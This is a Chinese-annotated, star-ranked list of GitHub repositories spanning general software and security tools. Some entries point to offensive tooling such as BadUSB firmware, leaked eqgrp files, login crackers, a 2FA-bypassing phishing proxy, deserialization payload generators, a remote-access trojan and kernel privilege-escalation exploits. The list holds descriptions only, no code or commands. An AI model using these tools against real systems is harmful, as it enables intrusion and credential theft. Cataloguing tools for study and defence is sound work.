- [**3645**星][6y] [C#] [brandonlw/psychson](https://github.com/brandonlw/Psychson) Phison 2251-03(2303)定制固件和现有固件补丁(BadUSB)
- [**3643**星][3y] [C] [hak5darren/usb-rubber-ducky](https://github.com/hak5darren/usb-rubber-ducky) 使用简单的脚本语言可编程的人机界面设备,允许渗透测试人员快速、轻松地设计和部署模拟人类键盘输入的安全审计负载。
- [**3627**星][10d] [C#] [mathewsachin/captura](https://github.com/mathewsachin/captura) Capture Screen, Audio, Cursor, Mouse Clicks and Keystrokes
- [**3627**星][8d] [C] [virustotal/yara](https://github.com/virustotal/yara) 模式匹配瑞士军刀
- [**3618**星][10d] [teivah/algodeck](https://github.com/teivah/algodeck) An Open-Source Collection of +200 Algorithmic Flash Cards to Help you Preparing your Algorithm & Data Structure Interview
- [**3614**星][10d] [Py] [rarcega/instagram-scraper](https://github.com/rarcega/instagram-scraper) Scrapes an instagram user's photos and videos
- [**3609**星][3y] [Perl] [x0rz/eqgrp](https://github.com/x0rz/eqgrp) Decrypted content of eqgrp-auction-file.tar.xz
- [**3597**星][2y] [C#] [nummer/destroy-windows-10-spying](https://github.com/nummer/destroy-windows-10-spying) 摧毁Windows间谍工具
- [**3592**星][1y] [C] [rpisec/mbe](https://github.com/rpisec/mbe) Course materials for Modern Binary Exploitation by RPISEC
- [**3589**星][11d] [Go] [fanpei91/torsniff](https://github.com/fanpei91/torsniff) 从BitTorrent网络嗅探种子
- [**3589**星][11d] [Go] [fanpei91/torsniff](https://github.com/fanpei91/torsniff) 从BitTorrent网络嗅探种子
- [**3584**星][11d] [Py] [stamparm/maltrail](https://github.com/stamparm/maltrail) 恶意网络流量检测系统
- [**3582**星][10d] [C] [betaflight/betaflight](https://github.com/betaflight/betaflight) 开源飞行控制器固件
- [**3579**星][7d] [C#] [win-acme/win-acme](https://github.com/win-acme/win-acme) 一个用于Windows的简单ACME客户端(用于Let's Encrypt等)。
- [**3579**星][10d] [HTML] [goproxy/goproxy.cn](https://github.com/goproxy/goproxy.cn) 中国最受信任的Go模块代理
- [**3576**星][10d] [C] [qemu/qemu](https://github.com/qemu/qemu) 官方QEMU镜像
- [**3554**星][10d] [C] [tmate-io/tmate](https://github.com/tmate-io/tmate) 即时终端共享
- [**3551**星][10d] [hslatman/awesome-threat-intelligence](https://github.com/hslatman/awesome-threat-intelligence) A curated list of Awesome Threat Intelligence resources
- [**3550**星][10d] [HTML] [grangier/python-goose](https://github.com/grangier/python-goose) Html内容/文章提取器,Python的web爬取库
- [**3549**星][4m] [Java] [jasonchenlijian/fastble](https://github.com/jasonchenlijian/fastble) Android蓝牙低功耗(BLE)快速开发框架。
- [**3538**星][6y] [R] [johnmyleswhite/ml_for_hackers](https://github.com/johnmyleswhite/ml_for_hackers) 《Machine Learning for Hackers》随书代码
- [**3538**星][10m] [Shell] [chengr28/revokechinacerts](https://github.com/chengr28/revokechinacerts) 全自动可疑证书吊销工具
- [**3532**星][10d] [sundowndev/hacker-roadmap](https://github.com/sundowndev/hacker-roadmap) an overview of what you need to learn penetration testing and a collection of hacking tools, resources and references to practice ethical hacking
- [**3523**星][10d] [CSS] [juliocesarfort/public-pentesting-reports](https://github.com/juliocesarfort/public-pentesting-reports) 由多家咨询公司和学术安全组织发布的公共渗透测试报告的精选清单
- [**3510**星][10d] [JS] [digitalbazaar/forge](https://github.com/digitalbazaar/forge) TLS在Javascript中的原生实现和工具,用于编写基于加密和大量网络的web应用程序
- [**3509**星][4m] [Java] [meituan-dianping/robust](https://github.com/meituan-dianping/robust) 一个具有高兼容性和高稳定性的Android热修复解决方案
- [**3503**星][11m] [C] [session-replay-tools/tcpcopy](https://github.com/session-replay-tools/tcpcopy) TCP 流量回放工具,可用于性能测试、稳定性测试、压力测试、加载测试、smoke 测试等
- [**3494**星][12d] [JS] [ionicabizau/scrape-it](https://github.com/ionicabizau/scrape-it) A Node.js scraper for humans.
- [**3486**星][11d] [JS] [duo-labs/cloudmapper](https://github.com/duo-labs/cloudmapper) 生成AWS环境的网络拓扑图
- [**3477**星][11d] [HTML] [leizongmin/js-xss](https://github.com/leizongmin/js-xss) 使用白名单指定的配置对不受信任的HTML(以防止XSS)进行无害化处理
- [**3477**星][10d] [Shell] [gfw-breaker/ssr-accounts](https://github.com/gfw-breaker/ssr-accounts) 一键部署Shadowsocks服务;免费Shadowsocks账号分享;免费SS账号分享; 翻墙;无界,自由门,SquirrelVPN
- [**3476**星][11d] [Py] [google/grr](https://github.com/google/grr) 事件响应的远程实时取证
- [**3475**星][10m] [C++] [wangyu-/udp2raw-tunnel](https://github.com/wangyu-/udp2raw-tunnel) udp 打洞。通过raw socket给UDP包加上TCP或ICMP header,进而绕过UDP屏蔽或QoS,或在UDP不稳定的环境下提升稳定性
- [**3468**星][2m] [JS] [mcollina/autocannon](https://github.com/mcollina/autocannon) 用Node.js编写的快速HTTP/1.1基准测试工具
- [**3458**星][11d] [Go] [imgproxy/imgproxy](https://github.com/imgproxy/imgproxy) Fast and secure standalone server for resizing and converting remote images
- [**3451**星][4m] [C] [vanhauser-thc/thc-hydra](https://github.com/vanhauser-thc/thc-hydra) 网络登录破解,支持多种服务。一个概念代码的证明,让研究人员和安全顾问有可能展示从远程获取系统的未授权访问是多么容易。
- [**3448**星][10d] [C] [raspberrypi/firmware](https://github.com/raspberrypi/firmware) 预编译的二进制文件的当前树莓派内核和模块,用户空间库,和引导加载程序/GPU固件。
- [**3445**星][10d] [C] [nbs-system/naxsi](https://github.com/nbs-system/naxsi) 一个开源,高性能,低规则维护的NGINX WAF
- [**3443**星][4m] [Rust] [canop/broot](https://github.com/canop/broot) A new way to see and navigate directory trees :
- [**3440**星][10d] [C] [unicorn-engine/unicorn](https://github.com/unicorn-engine/unicorn) CPU仿真器框架
- [**3435**星][10d] [Makefile] [lorien/awesome-web-scraping](https://github.com/lorien/awesome-web-scraping) List of libraries, tools and APIs for web scraping and data processing.
- [**3432**星][10d] [icodesign/potatso](https://github.com/icodesign/Potatso) 一个iOS客户端,利用ios10 +的NetworkExtension框架实现不同的代理。
- [**3432**星][10d] [Shell] [softwaredownload/openwrt-fanqiang](https://github.com/softwaredownload/openwrt-fanqiang) 最好的路由器翻墙、科学上网教程
- [**3428**星][10d] [Go] [dvyukov/go-fuzz](https://github.com/dvyukov/go-fuzz) 针对Go包的以覆盖为导向的Fuzzing解决方案
- [**3425**星][11d] [Shell] [hwdsl2/docker-ipsec-vpn-server](https://github.com/hwdsl2/docker-ipsec-vpn-server) 运行一个IPsec VPN服务器的Docker镜像,使用IPsec/L2TP和Cisco IPsec
- [**3422**星][10d] [Go] [michenriksen/aquatone](https://github.com/michenriksen/aquatone) 可视化的对大量主机上的网站进行探查,方便地快速了解基于HTTP的攻击面
<details>
<summary>查看详情</summary>
## Misc
- 需要Google Chrome/Chromium浏览器
- 下载编译好的二进制文件,或自己编译
- 可以通过管道与现有工具集成
</details>
- [**3420**星][12d] [Java] [oldmanpushcart/greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy) Java诊断工具
- [**3419**星][8m] [Py] [volatilityfoundation/volatility](https://github.com/volatilityfoundation/volatility) 一个先进的内存取证框架
- [**3418**星][6m] [ObjC] [objective-see/lulu](https://github.com/objective-see/lulu) 免费的macOS防火墙
- [**3409**星][5m] [C] [microsoft/windows-driver-samples](https://github.com/microsoft/windows-driver-samples) 驱动程序样本准备与微软Visual Studio和Windows驱动程序工具包(WDK)一起使用。
- [**3405**星][4m] [Java] [hustcc/js-sorting-algorithm](https://github.com/hustcc/js-sorting-algorithm) 一本关于排序算法的 GitBook 在线书籍 《十大经典排序算法》,多语言实现。
- [**3396**星][7d] [C] [microsoft/wsl2-linux-kernel](https://github.com/microsoft/wsl2-linux-kernel) The source for the Linux kernel used in Windows Subsystem for Linux 2 (WSL2)
- [**3395**星][11d] [meirwah/awesome-incident-response](https://github.com/meirwah/awesome-incident-response) A curated list of tools for incident response
- [**3395**星][11d] [Haskell] [input-output-hk/cardano-sl](https://github.com/input-output-hk/cardano-sl) 实现Ouroboros PoS协议的加密货币
- [**3393**星][7d] [Vue] [chaitin/xray](https://github.com/chaitin/xray) 一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc
- [**3391**星][10d] [Go] [tencent/bk-cmdb](https://github.com/tencent/bk-cmdb) 蓝鲸智云配置平台(BlueKing CMDB)
- [**3387**星][10d] [Rust] [spacejam/sled](https://github.com/spacejam/sled) 嵌入式数据库的champagne
- [**3387**星][10d] [Go] [getlantern/lantern](https://github.com/getlantern/lantern) Lantern官方版本下载 蓝灯 翻墙 代理 科学上网 外网 加速器 梯子 路由
- [**3384**星][10d] [JS] [evilsocket/pwnagotchi](https://github.com/evilsocket/pwnagotchi) 深度学习+Bettercap,基于A2C,从周围的WiFi环境中学习,以最大程度地利用捕获的WPA关键信息
- [**3380**星][4m] [Swift] [yagiz/bagel](https://github.com/yagiz/bagel) 一个用于iOS的本地网络调试工具
- [**3379**星][4m] [C] [magnumripper/johntheripper](https://github.com/magnumripper/johntheripper) John the Ripper官方repo:一个快速的密码破解
- [**3379**星][2m] [PS] [fireeye/commando-vm](https://github.com/fireeye/commando-vm) 一个完全可定制的基于windows的渗透虚拟机发行版。
- [**3378**星][10d] [Java] [phishman3579/java-algorithms-implementation](https://github.com/phishman3579/java-algorithms-implementation) Algorithms and Data Structures implemented in Java
- [**3377**星][10d] [JS] [minbrowser/min](https://github.com/minbrowser/min) 一个快速,最小的浏览器,保护您的隐私
- [**3369**星][10d] [Py] [drivendata/cookiecutter-data-science](https://github.com/drivendata/cookiecutter-data-science) 一种逻辑的、合理标准化的、但灵活的项目结构,用于执行和共享数据科学工作
- [**3366**星][11d] [C] [taviso/loadlibrary](https://github.com/taviso/loadlibrary) 使 Linux系统加载并调用 Windows DLL
- [**3349**星][9d] [C++] [fireice-uk/xmr-stak](https://github.com/fireice-uk/xmr-stak) 免费Monero RandomX矿机和统一CryptoNight矿机
- [**3340**星][3m] [TS] [jigsaw-code/outline-server](https://github.com/jigsaw-code/outline-server) 在DigitalOcean上创建和管理Outline服务器
- [**3327**星][10d] [JS] [sindresorhus/speed-test](https://github.com/sindresorhus/speed-test) 使用来自CLI的speedtest.net测试您的internet连接速度和ping
- [**3325**星][11d] [HTML] [ctf-wiki/ctf-wiki](https://github.com/ctf-wiki/ctf-wiki) 在线的CTF Wiki
- [**3322**星][4m] [scanate/ethlist](https://github.com/scanate/ethlist) The Comprehensive Ethereum Reading List
- [**3321**星][10d] [PS] [redcanaryco/atomic-red-team](https://github.com/redcanaryco/atomic-red-team) 基于MITRE ATT&CK 的检测脚本
- [**3317**星][10d] [Py] [felixonmars/dnsmasq-china-list](https://github.com/felixonmars/dnsmasq-china-list) Chinese-specific configuration to improve your favorite DNS server. Best partner for chnroutes.
- [**3312**星][11d] [Py] [pyca/cryptography](https://github.com/pyca/cryptography) 一个用于向Python开发人员公开密码原语和配方的包。
- [**3310**星][4m] [C++] [spiderlabs/modsecurity](https://github.com/spiderlabs/modsecurity) 用于Apache、IIS和Nginx的跨平台web应用程序防火墙(WAF)引擎
- [**3301**星][11d] [C] [secwiki/linux-kernel-exploits](https://github.com/secwiki/linux-kernel-exploits) Linux平台提权漏洞集合
- [**3299**星][12d] [Dockerfile] [thinkdevelop/free-ss-ssr](https://github.com/thinkdevelop/free-ss-ssr) SS账号、SSR账号、V2Ray账号
- [**3296**星][10d] [Java] [calebfenton/simplify](https://github.com/calebfenton/simplify) Android虚拟机和deobfuscator
- [**3293**星][3m] [Shell] [1n3/sn1per](https://github.com/1n3/sn1per) 自动化渗透测试框架
- [**3289**星][10d] [Lua] [ntop/ntopng](https://github.com/ntop/ntopng) 基于Web的流量监控工具
- [**3288**星][3m] [C] [valdikss/goodbyedpi](https://github.com/valdikss/goodbyedpi) 绕过许多已知的网络服务提供商提供的阻止访问某些网站的深度数据包检查系统
- [**3282**星][10d] [Py] [corna/me_cleaner](https://github.com/corna/me_cleaner) 英特尔 ME /TXE 固件映像 partial deblobbing 的工具
- [**3278**星][4m] [C++] [px4/firmware](https://github.com/px4/firmware) PX4无人机飞行控制解决方案
- [**3271**星][10d] [Go] [meshbird/meshbird](https://github.com/meshbird/meshbird) 云本地多区域多云分散私有网络
- [**3269**星][15d] [C++] [google/lmctfy](https://github.com/google/lmctfy) 谷歌的容器堆栈的开源版本,它提供Linux应用程序容器。
- [**3265**星][10d] [C] [processhacker/processhacker](https://github.com/processhacker/processhacker) 监视系统资源,调试软件和检测恶意软件
- [**3262**星][10d] [TS] [google/incremental-dom](https://github.com/google/incremental-dom) 一个本地DOM Diff库
- [**3257**星][9m] [C] [yarrick/iodine](https://github.com/yarrick/iodine) 通过DNS服务器传输(tunnel)IPV4数据
- [**3253**星][5y] [C] [shadowsocks/chinadns](https://github.com/shadowsocks/chinadns) 保护您自己免受DNS中毒
- [**3250**星][10m] [ObjC] [naituw/ipapatch](https://github.com/naituw/ipapatch) 补丁iOS应用程序,简单的方法,没有越狱。
- [**3249**星][10d] [Go] [gwuhaolin/lightsocks](https://github.com/gwuhaolin/lightsocks) 轻量级网络混淆代理,基于 SOCKS5 协议,可用来代替 Shadowsocks
- [**3245**星][4m] [Py] [byt3bl33d3r/crackmapexec](https://github.com/byt3bl33d3r/crackmapexec) 后渗透工具,自动化评估大型Active Directory网络的安全性
- [**3243**星][11d] [Shell] [speed47/spectre-meltdown-checker](https://github.com/speed47/spectre-meltdown-checker) 检查 Linux 主机是否受处理器漏洞Spectre & Meltdown 的影响
- [**3239**星][10d] [Shell] [pivpn/pivpn](https://github.com/pivpn/pivpn) 树莓派的OpenVPN安装程序
- [**3236**星][2y] [CSS] [jbtronics/crookedstylesheets](https://github.com/jbtronics/crookedstylesheets) 使用纯CSS收集网页/用户信息
- [**3234**星][10d] [Py] [stvir/pysot](https://github.com/stvir/pysot) SenseTime单目标跟踪研究平台,实现SiamRPN、SiamMask等算法。
- [**3228**星][12d] [Shell] [trimstray/htrace.sh](https://github.com/trimstray/htrace.sh) 瑞士军刀:http/https故障诊断和剖析。
- [**3227**星][10d] [Py] [kootenpv/whereami](https://github.com/kootenpv/whereami) 使用Wifi信号和机器学习预测你的位置,精确度2-10米
- [**3222**星][3m] [C++] [0xz0f/z0fcourse_reverseengineering](https://github.com/0xz0f/z0fcourse_reverseengineering) Reverse engineering focusing on x64 Windows.
- [**3222**星][6m] [Py] [mininet/mininet](https://github.com/mininet/mininet) 用于软件定义网络的快速原型设计的仿真器
- [**3220**星][2m] [Go] [99designs/aws-vault](https://github.com/99designs/aws-vault) 在开发环境中安全地存储和访问AWS凭据的保险库
- [**3219**星][10d] [JS] [bkimminich/juice-shop](https://github.com/bkimminich/juice-shop) 可能是最现代和最复杂的Vulnerable的web应用程序
- [**3217**星][10d] [C] [libfuse/sshfs](https://github.com/libfuse/sshfs) 连接到SSH服务器的网络文件系统客户机
- [**3213**星][6m] [Java] [deathmarine/luyten](https://github.com/deathmarine/luyten) 用于Procyon的Java反编译器Gui
- [**3210**星][3y] [shadowsocksr-backup/shadowsocksr-android](https://github.com/shadowsocksr-backup/shadowsocksr-android) Android的ShadowsocksR客户端
- [**3209**星][10d] [Go] [securego/gosec](https://github.com/securego/gosec) 通过扫描Go源码SAT来检查源代码的安全问题
- [**3204**星][3m] [C#] [quantconnect/lean](https://github.com/quantconnect/lean) Lean Algorithmic Trading Engine by QuantConnect (C#, Python, F#)
- [**3202**星][10d] [secwiki/sec-chart](https://github.com/secwiki/sec-chart) 安全思维导图集合
- [**3200**星][11d] [Shell] [txthinking/google-hosts](https://github.com/txthinking/google-hosts) Google hosts generator
- [**3197**星][10d] [Py] [tribler/tribler](https://github.com/tribler/tribler) 隐私增强的BitTorrent客户端与P2P内容发现
- [**3187**星][10d] [Go] [dominikh/go-tools](https://github.com/dominikh/go-tools) Staticcheck - The advanced Go linter
- [**3180**星][10d] [Py] [gnemoug/distribute_crawler](https://github.com/gnemoug/distribute_crawler) 使用scrapy,redis, mongodb,graphite实现的一个分布式网络爬虫,底层存储mongodb集群,分布式使用redis实现,爬虫状态显示使用graphite实现
- [**3179**星][3m] [CSS] [readthedocs/sphinx_rtd_theme](https://github.com/readthedocs/sphinx_rtd_theme) Sphinx theme for readthedocs.org
- [**3176**星][15d] [Ruby] [sagivo/algorithms](https://github.com/sagivo/algorithms) algorithms playground for common questions
- [**3174**星][10d] [tycrek/degoogle](https://github.com/tycrek/degoogle) A huge list of alternatives to Google products. Privacy tips, tricks, and links.
- [**3166**星][11d] [Py] [guardicore/monkey](https://github.com/guardicore/monkey) 自动化渗透测试工具, 测试数据中心的弹性, 以防范周边(perimeter)泄漏和内部服务器感染
- [**3165**星][7d] [Py] [andresriancho/w3af](https://github.com/andresriancho/w3af) Web App安全扫描器, 辅助开发者和渗透测试人员识别和利用Web App中的漏洞
- [**3157**星][4m] [C] [zmap/zmap](https://github.com/zmap/zmap) 一种快速的单包网络扫描器,用于internet范围的网络调查。
- [**3150**星][10d] [Py] [trustedsec/ptf](https://github.com/trustedsec/ptf) 创建基于Debian/Ubuntu/ArchLinux的渗透测试环境
- [**3138**星][4m] [infosecn1nja/red-teaming-toolkit](https://github.com/infosecn1nja/red-teaming-toolkit) A collection of open source and commercial tools that aid in red team operations.
- [**3137**星][10d] [ObjC] [google/santa](https://github.com/google/santa) 用于Mac系统的二进制文件白名单/黑名单系统
- [**3133**星][3m] [C#] [microsoft/applicationinspector](https://github.com/microsoft/applicationinspector) A source code analyzer built for surfacing features of interest and other characteristics to answer the question 'what's in it' using static analysis with a json based rules engine. Ideal for scanning components before use or detecting feature level changes.
- [**3130**星][11d] [Py] [cowrie/cowrie](https://github.com/cowrie/cowrie) 中型/交互型 SSH/Telnet 蜜罐,
- [**3125**星][10d] [Go] [kgretzky/evilginx2](https://github.com/kgretzky/evilginx2) 独立的MITM攻击工具,用于登录凭证钓鱼,可绕过双因素认证
- [**3123**星][3m] [Go] [aquasecurity/trivy](https://github.com/aquasecurity/trivy) 一个简单而全面的容器漏洞扫描器,适合于CI
- [**3123**星][3m] [Go] [cookiey/yearning](https://github.com/cookiey/yearning) 一个最流行的mysql sql审计平台
- [**3120**星][10d] [C] [p-h-c/phc-winner-argon2](https://github.com/p-h-c/phc-winner-argon2) C实现的Argon2,密码hash功能。-
- [**3120**星][10d] [ObjC] [dantheman827/ios-app-signer](https://github.com/dantheman827/ios-app-signer) 一个OS X的应用程序,可以(重新)签署应用程序,并将它们捆绑到ipa文件中,准备安装在iOS设备上。
- [**3117**星][7d] [Java] [frohoff/ysoserial](https://github.com/frohoff/ysoserial) 生成会利用不安全的Java对象反序列化的Payload
- [**3116**星][10d] [JS] [ix64/unlock-music](https://github.com/ix64/unlock-music) Unlock encrypted music file in browser. 在浏览器中解锁加密的音乐文件。
- [**3111**星][10d] [Py] [espressif/esptool](https://github.com/espressif/esptool) ESP8266和ESP32串行bootloader程序实用程序
- [**3106**星][7m] [JS] [valve/fingerprintjs](https://github.com/valve/fingerprintjs) 匿名浏览器指纹
- [**3106**星][10d] [PHP] [owner888/phpspider](https://github.com/owner888/phpspider) 《我用爬虫一天时间“偷了”知乎一百万用户,只为证明PHP是世界上最好的语言 》所使用的程序
- [**3105**星][10d] [Jupyter Notebook] [zotroneneis/machine_learning_basics](https://github.com/zotroneneis/machine_learning_basics) Plain python implementations of basic machine learning algorithms
- [**3105**星][10d] [C++] [qv2ray/qv2ray](https://github.com/Qv2ray/Qv2ray)
- [**3102**星][10d] [C++] [google/robotstxt](https://github.com/google/robotstxt) 存储库包含谷歌的robots.txt解析器和匹配器作为一个c++库(符合c++ 11)。
- [**3097**星][9m] [Py] [spiderlabs/responder](https://github.com/spiderlabs/responder) LLMNR/NBT-NS/MDNS投毒,内置HTTP/SMB/MSSQL/FTP/LDAP认证服务器, 支持NTLMv1/NTLMv2/LMv2
- [**3095**星][10d] [Go] [oj/gobuster](https://github.com/oj/gobuster) 爆破:URI/DNS子域名/虚拟主机名
- [**3087**星][8d] [C++] [xmrig/xmrig](https://github.com/xmrig/xmrig) 门罗币挖矿代码 CPU 版
- [**3082**星][10d] [Py] [lyst/lightfm](https://github.com/lyst/lightfm) LightFM的Python实现,混合推荐算法
- [**3078**星][4m] [JS] [webgoat/webgoat](https://github.com/webgoat/webgoat) 带漏洞WebApp
- [**3077**星][1y] [JS] [jipegit/osxauditor](https://github.com/jipegit/osxauditor) 一个免费的Mac OS X计算机取证工具
- [**3073**星][10d] [Swift] [zhuhaow/spechtlite](https://github.com/zhuhaow/spechtlite) A rule-based proxy for macOS
- [**3069**星][10d] [Go] [schollz/croc](https://github.com/schollz/croc) Easily and securely send things from one computer to another
- [**3061**星][10d] [Py] [cloudflare/flan](https://github.com/cloudflare/flan) A pretty sweet vulnerability scanner
- [**3060**星][10d] [C++] [qtox/qtox](https://github.com/qtox/qtox) 聊天,语音,视频和文件传输IM客户端使用加密的点对点传输协议
- [**3032**星][2y] [phith0n/mind-map](https://github.com/phith0n/mind-map) 各种安全相关思维导图整理收集
- [**3029**星][7d] [Py] [danmcinerney/wifijammer](https://github.com/danmcinerney/wifijammer) 持续劫持范围内的Wifi客户端和AP
- [**3027**星][10d] [Py] [androguard/androguard](https://github.com/androguard/androguard) Android应用程序的逆向工程、恶意软件和软件分析
- [**3026**星][10d] [C] [ossec/ossec-hids](https://github.com/ossec/ossec-hids) 入侵检测系统
- [**3025**星][3m] [Java] [williamfiset/algorithms](https://github.com/williamfiset/algorithms) A collection of algorithms and data structures
- [**3022**星][10d] [C] [lxc/lxc](https://github.com/lxc/lxc) Linux容器
- [**3016**星][3m] [Java] [anuken/mindustry](https://github.com/anuken/mindustry) A sandbox tower defense game
- [**3013**星][4m] [C++] [tensorflow/minigo](https://github.com/tensorflow/minigo) AlphaGoZero 神经网络算法的Python实现版, 非官方版AlphaGo,基于 TensorFlow
- [**3003**星][11m] [C++] [pytorch/elf](https://github.com/pytorch/elf) 一个带有AlphaGoZero/AlphaZero再实现的游戏研究平台
- [**2994**星][8d] [Shell] [mskyaxl/wsl-terminal](https://github.com/mskyaxl/wsl-terminal) Linux Windows子系统终端仿真器(WSL)
- [**2991**星][10d] [ObjC] [facebook/idb](https://github.com/facebook/idb) idb is a flexible command line interface for automating iOS simulators and devices
- [**2991**星][10d] [Go] [statping/statping](https://github.com/statping/statping) 状态页监测您的网站和应用程序与美丽的图形,分析,和插件。在任何类型的环境中运行。
- [**2986**星][3m] [C++] [zeek/zeek](https://github.com/zeek/zeek) Zeek is a powerful network analysis framework that is much different from the typical IDS you may know.
- [**2984**星][10d] [Lua] [loveshell/ngx_lua_waf](https://github.com/loveshell/ngx_lua_waf) 基于lua-nginx-module(openresty)的web应用防火墙
- [**2983**星][11d] [pditommaso/awesome-pipeline](https://github.com/pditommaso/awesome-pipeline) A curated list of awesome pipeline toolkits inspired by Awesome Sysadmin
- [**2978**星][10d] [Py] [liuxingming/sinaspider](https://github.com/liuxingming/sinaspider) 新浪微博爬虫(Scrapy、Redis)
- [**2972**星][10d] [Py] [billryan/algorithm-exercise](https://github.com/billryan/algorithm-exercise) Data Structure and Algorithm notes. 数据结构与算法/leetcode/lintcode题解/
- [**2969**星][5m] [secfigo/awesome-fuzzing](https://github.com/secfigo/awesome-fuzzing) A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.
- [**2967**星][11d] [ObjC] [maciekish/iresign](https://github.com/maciekish/iresign) 允许苹果设备应用程序包(.ipa)文件签署或辞职与数字证书从苹果发布
- [**2958**星][4m] [Shell] [91yun/serverspeeder](https://github.com/91yun/serverspeeder) 锐速破解版
- [**2953**星][10d] [Py] [instantbox/instantbox](https://github.com/instantbox/instantbox) 在几秒钟内获得一个干净的、准备就绪的Linux机器。
- [**2947**星][1y] [C++] [wangyu-/udpspeeder](https://github.com/wangyu-/udpspeeder) 通过对所有流量(TCP/UDP/ICMP)使用前向纠错,在高延迟损耗链路上提高网络质量的通道。
- [**2938**星][2y] [Py] [byt3bl33d3r/mitmf](https://github.com/byt3bl33d3r/mitmf) 中间人攻击的框架
- [**2932**星][1y] [C#] [quasar/quasarrat](https://github.com/quasar/quasarrat) Windows远程管理工具
- [**2930**星][10d] [Go] [libp2p/go-libp2p](https://github.com/libp2p/go-libp2p) 在Go中实现libp2p
- [**2929**星][1y] [C++] [chrisknott/algojammer](https://github.com/chrisknott/algojammer) 一个用于编写算法的实验性代码编辑器
- [**2927**星][12d] [JS] [laurentj/slimerjs](https://github.com/laurentj/slimerjs) 一个基于Firefox的可编写脚本的浏览器,如PhantomJS
- [**2926**星][10d] [Go] [caddyserver/certmagic](https://github.com/caddyserver/certmagic) Automatic HTTPS for any Go program: fully-managed TLS certificate issuance and renewal
- [**2925**星][10d] [valvesoftware/steam-for-linux](https://github.com/valvesoftware/steam-for-linux) Linux beta客户端Steam的问题跟踪
- [**2922**星][10d] [C] [klange/toaruos](https://github.com/klange/toaruos) 一个完全从头开始的业余爱好操作系统:引导加载程序、内核、驱动程序、C库和用户空间,包括合成的图形用户界面、动态链接器、语法高亮文本编辑器、网络堆栈等。
- [**2921**星][4m] [C++] [tstack/lnav](https://github.com/tstack/lnav) Log file navigator
- [**2920**星][11d] [paulsec/awesome-sec-talks](https://github.com/paulsec/awesome-sec-talks) A collected list of awesome security talks
- [**2920**星][10d] [Go] [google/syzkaller](https://github.com/google/syzkaller) 一个unsupervised、以 coverage 为导向的Linux 系统调用fuzzer
- [**2918**星][5m] [C#] [vsvim/vsvim](https://github.com/VsVim/VsVim) Vim仿真器插件的Visual Studio 2015+
- [**2918**星][11d] [Makefile] [theos/theos](https://github.com/theos/theos) 一套跨平台的工具,用于为iOS和其他平台构建和部署软件。
- [**2916**星][10d] [TS] [webhintio/hint](https://github.com/webhintio/hint)
- [**2908**星][4m] [C#] [netchx/netch](https://github.com/netchx/netch) 游戏加速器。支持:Socks5, Shadowsocks, ShadowsocksR, V2Ray 协议
- [**2903**星][10d] [Swift] [kasketis/netfox](https://github.com/kasketis/netfox) 一个轻量级,单行设置,iOS / OSX网络调试库!
- [**2895**星][4m] [Java] [rovo89/xposedinstaller](https://github.com/rovo89/xposedinstaller)
- [**2894**星][11d] [Shell] [teddysun/across](https://github.com/teddysun/across) 一个用于配置和启动WireGuard VPN服务器的shell脚本
- [**2893**星][10d] [Py] [shadowsocksrr/shadowsocksr](https://github.com/shadowsocksrr/shadowsocksr) Python port of ShadowsocksR
- [**2888**星][7m] [Assembly] [cirosantilli/x86-bare-metal-examples](https://github.com/cirosantilli/x86-bare-metal-examples) 几十个用于学习 x86 系统编程的小型操作系统
- [**2877**星][12d] [Py] [nryoung/algorithms](https://github.com/nryoung/algorithms) 一个用Python实现的算法和数据结构的库。
- [**2875**星][4m] [C] [tmk/tmk_keyboard](https://github.com/tmk/tmk_keyboard) Atmel AVR 和 Cortex-M键盘固件收集
- [**2872**星][10d] [C] [esnet/iperf](https://github.com/esnet/iperf) 一个TCP, UDP和SCTP网络带宽测量工具
- [**2865**星][10d] [Py] [hugsy/gef](https://github.com/hugsy/gef) gdb增强工具,使用Python API,用于漏洞开发和逆向分析。
- [**2859**星][4m] [ObjC] [chatsecure/chatsecure-ios](https://github.com/chatsecure/chatsecure-ios) ChatSecure is a free and open source encrypted chat client for iOS that supports OTR and OMEMO encryption over XMPP.
- [**2857**星][10d] [Py] [rogandawes/p4wnp1](https://github.com/RoganDawes/P4wnP1) 基于Raspberry Pi Zero 或 Raspberry Pi Zero W 的USB攻击平台, 高度的可定制性
- [**2853**星][2y] [CSS] [maxchehab/css-keylogging](https://github.com/maxchehab/css-keylogging) Chrome扩展和Express服务器利用了CSS的键盘记录功能。
- [**2852**星][10d] [Py] [plasma-disassembler/plasma](https://github.com/plasma-disassembler/plasma) Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.
- [**2851**星][10d] [JS] [noble/noble](https://github.com/noble/noble) 一个Node.js BLE(蓝牙低能量)中央模块
- [**2849**星][10d] [JS] [trufflesuite/ganache-cli](https://github.com/trufflesuite/ganache-cli) Fast Ethereum RPC client for testing and development
- [**2847**星][4m] [Makefile] [shadowsocks/openwrt-shadowsocks](https://github.com/shadowsocks/openwrt-shadowsocks) Shadowsocks-libev for OpenWrt/LEDE
- [**2843**星][11d] [Go] [anthonynsimon/bild](https://github.com/anthonynsimon/bild) A collection of parallel image processing algorithms in pure Go
- [**2842**星][17d] [TS] [microsoftdx/vorlonjs](https://github.com/microsoftdx/vorlonjs) 与平台无关的工具,用于远程调试和测试JavaScript
- [**2841**星][3m] [Py] [kr1s77/python-crawler-tutorial-starts-from-zero](https://github.com/Kr1s77/Python-crawler-tutorial-starts-from-zero) python爬虫教程,带你从零到一,包含js逆向,selenium, tesseract OCR识别,mongodb的使用,以及scrapy框架
- [**2838**星][1y] [Py] [p0cl4bs/wifi-pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) AP攻击框架, 创建虚假网络, 取消验证攻击、请求和凭证监控、透明代理、Windows更新攻击、钓鱼管理、ARP投毒、DNS嗅探、Pumpkin代理、动态图片捕获等
- [**2832**星][1y] [HTML] [ptwobrussell/mining-the-social-web-2nd-edition](https://github.com/ptwobrussell/mining-the-social-web-2nd-edition) The official online compendium for Mining the Social Web, 2nd Edition (O'Reilly, 2013)
- [**2832**星][10d] [C++] [danmar/cppcheck](https://github.com/danmar/cppcheck) C/ c++代码的静态分析
- [**2829**星][10d] [Java] [pmd/pmd](https://github.com/pmd/pmd) 一个可扩展的多语言静态代码分析器
- [**2823**星][4m] [rmusser01/infosec_reference](https://github.com/rmusser01/infosec_reference) An Information Security Reference That Doesn't Suck
